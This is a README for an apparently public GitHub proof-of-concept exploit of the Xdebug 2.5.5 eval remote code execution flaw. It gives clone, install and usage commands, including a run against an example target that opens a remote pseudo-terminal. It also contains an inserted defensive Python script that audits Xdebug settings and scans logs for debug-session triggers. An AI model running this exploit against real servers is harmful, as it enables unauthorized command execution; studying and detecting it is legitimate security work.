D3Ext/xdebug-exploit
xdebug 2.5.5 RCE

An automated POC exploit of the xdebug 2.5.5 RCE vulnerability

Vulnerability

This vulnerability can be abused because of the eval command present in Xdebug versions 2.5.5 and below. It allows an attacker to execute arbitrary PHP code in the context of the web server user.
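As an added defensive example (not code from this repository), the check below audits an Xdebug 2.x ini fragment for the settings that let any client make the debugger connect back to it and reach the eval command, and scans web-server access-log lines for the XDEBUG_SESSION_START parameter that asks Xdebug to open a session. The directive names are Xdebug 2.x's own; the ini text and log lines are constructed samples.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Xdebug 2.x directive values that count as "on".
ON = {"1", "on", "true", "yes"}

def parse_ini(ini_text):
    """Parse a php.ini-style fragment into {directive: value}; ';' comments stripped."""
    settings = {}
    for raw in ini_text.splitlines():
        line = raw.split(";", 1)[0].strip()
        if "=" in line:
            key, _, value = line.partition("=")
            settings[key.strip().lower()] = value.strip().strip('"').lower()
    return settings

def audit_xdebug_ini(ini_text):
    """Return findings for settings that expose the DBGp debugger (and its eval) to any client."""
    s = parse_ini(ini_text)
    if s.get("xdebug.remote_enable") not in ON:
        return []  # remote debugging is off: no DBGp session can be started
    findings = []
    if s.get("xdebug.remote_connect_back") in ON:
        findings.append("xdebug.remote_connect_back=1: debugger connects back to whichever client asks")
    host = s.get("xdebug.remote_host", "localhost")  # Xdebug 2.x default
    if host not in ("localhost", "127.0.0.1", "::1"):
        findings.append(f"xdebug.remote_host={host}: debugger connects to a non-local host")
    return findings

# Apache/nginx combined log format; only the fields we need are captured.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "\S+ (?P<target>\S+) [^"]*"')

def find_xdebug_triggers(log_lines):
    """Return (client_ip, timestamp, path) for requests asking Xdebug to start a session."""
    hits = []
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        url = urlsplit(m["target"])
        if "XDEBUG_SESSION_START" in parse_qs(url.query):
            hits.append((m["ip"], m["ts"], url.path))
    return hits

# Constructed samples (not taken from any real server).
SAMPLE_INI = "zend_extension=xdebug.so\nxdebug.remote_enable = 1\nxdebug.remote_connect_back = 1 ; any client\n"
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2025:12:00:00 +0000] "GET /index.php?XDEBUG_SESSION_START=1 HTTP/1.1" 200 512 "-" "curl/8.0"',
    '192.0.2.11 - - [01/Jan/2025:12:00:05 +0000] "GET /index.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
]
```

The session trigger can also arrive as a cookie or POST field, which combined-format logs do not record, so pair the log scan with the ini audit rather than relying on either alone.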

Installation

Download from source

git clone https://github.com/D3Ext/xdebug-exploit
cd xdebug-exploit
pip3 install -r requirements.txt
python3 exploit.py

Usage

Just execute the exploit and specify a valid URL to a PHP file (such as index.php) and the local host. The exploit will then try to establish a pseudo-terminal that lets you execute commands.

python3 exploit.py -u http://10.10.10.83/index.php -l 10.10.16.3

* In some cases the output won't be reflected at all and you will only see the first line of the executed command. This is not a problem of the script; the vulnerability works like this.

References

https://www.exploit-db.com/exploits/44568
https://www.tenable.com/plugins/nessus/112210
https://www.rapid7.com/db/modules/exploit/unix/http/xdebug_unauth_exec/

Disclaimer

Use this exploit under your own responsibility! The author is not responsible for any bad usage of it.

License

This project is under the MIT license.

Copyright © 2025, D3Ext